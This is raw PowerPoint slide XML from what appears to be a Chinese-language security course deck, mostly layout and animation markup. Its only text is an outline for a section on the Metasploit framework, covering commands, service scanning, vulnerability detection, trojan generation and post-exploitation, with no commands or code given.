                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1187251" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3333750"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3919220"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4504690"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5090160"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5675630"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="6261100"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
